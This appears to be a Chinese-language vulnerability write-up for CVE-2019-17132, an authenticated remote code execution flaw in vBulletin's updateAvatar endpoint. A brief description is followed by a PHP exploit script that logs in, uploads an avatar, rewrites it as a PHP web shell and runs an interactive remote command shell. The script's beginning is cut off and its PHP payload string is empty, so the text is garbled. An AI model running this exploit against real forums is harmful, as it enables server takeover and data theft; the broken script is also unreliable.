（CVE-2019-17132）vBulletin_5.0__5.5.4-‘updateAvatar’身份验证的远程代码执行漏洞

# （CVE-2019-17132）vBulletin 5.0 <5.5.4-'updateAvatar'身份验证的远程代码执行漏洞 == 一、漏洞简介 ------------ 用户输入更新头像的的时候，前未正确验证提交的"数据\[扩展\]"和"数据\[文件数据\]"参数就发送到了" ajax / api / user / updateavatar"，导致此突破的产生 利用此突破可以插入和执行任意php代码。 成功利用此突破需要"将头像另存为Files（头像保存为文件）"选项要启用（可选情况下少量）。 二、漏洞影响 ------------ 三、复现过程 ------------ \n”;
print “\nExample….: php $argv[0] http://localhost/vb/ user passwd”;
print “\nExample….: php $argv[0] [url]https://vbulletin.com/[/url] evil hacker\n\n”;
die();
}

list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];

$ch = curl_init();

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

print “\n[-] Logging in with username ‘{$user}’ and password ‘{$pass}’\n”;

curl_setopt($ch, CURLOPT_URL, $url);

if (!preg_match(“/Cookie: .*sessionhash=[^;]+/”, curl_exec($ch), $sid)) die(“[-] Session ID not found!\n”);

curl_setopt($ch, CURLOPT_URL, “{$url}?routestring=auth/login”);
curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
curl_setopt($ch, CURLOPT_POSTFIELDS, “username={$user}&password={$pass}”);

if (!preg_match(“/Cookie: .*sessionhash=[^;]+/”, curl_exec($ch), $sid)) die(“[-] Login failed!\n”);

print “[-] Logged-in! Retrieving security token…\n”;

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);

if (!preg_match(‘/token”: “([^”]+)”/’, curl_exec($ch), $token)) die(“[-] Security token not found!\n”);

print “[-] Uploading new avatar…\n”;

$params = [“profilePhotoFile” => new CURLFile(“avatar.jpeg”), “securitytoken” => $token[1]];

curl_setopt($ch, CURLOPT_URL, “{$url}?routestring=profile/upload-profilepicture”);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt($ch, CURLOPT_HEADER, false);

if (($path = (json_decode(curl_exec($ch)))->avatarpath) == null) die(“[-] Upload failed!\n”);

if (preg_match(‘/image\.php\?/’, $path)) die(“[-] Sorry, the ‘Save Avatars as Files’ option is disabled!\n”);

print “[-] Updating avatar with PHP shell…\n”;

$php_code = ‘‘;

$params = [“routestring” => “ajax/api/user/updateAvatar”,
“userid” => 0,
“avatarid” => 0,
“data[extension]” => “php”,
“data[filedata]” => $php_code,
“securitytoken” => $token[1]];

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));

if (curl_exec($ch) !== “true”) die(“[-] Update failed!\n”);

print “[-] 上传shell中…\n”;

preg_match(‘/(\d+)\.jpeg/’, $path, $m);
$path = preg_replace(‘/(\d+)\.jpeg/’, ($m[1]+1).”.php”, $path);

curl_setopt($ch, CURLOPT_URL, “{$url}core/{$path}”);
curl_setopt($ch, CURLOPT_POST, false);

while(1)
{
print “\nvb-shell# “;
if (($cmd = trim(fgets(STDIN))) == “exit”) break;
curl_setopt($ch, CURLOPT_HTTPHEADER, [“CMD: “.base64_encode($cmd)]);
preg_match(‘/____(.*)/s’, curl_exec($ch), $m) ? print $m[1] : die(“\n[-] Exploit failed!\n”);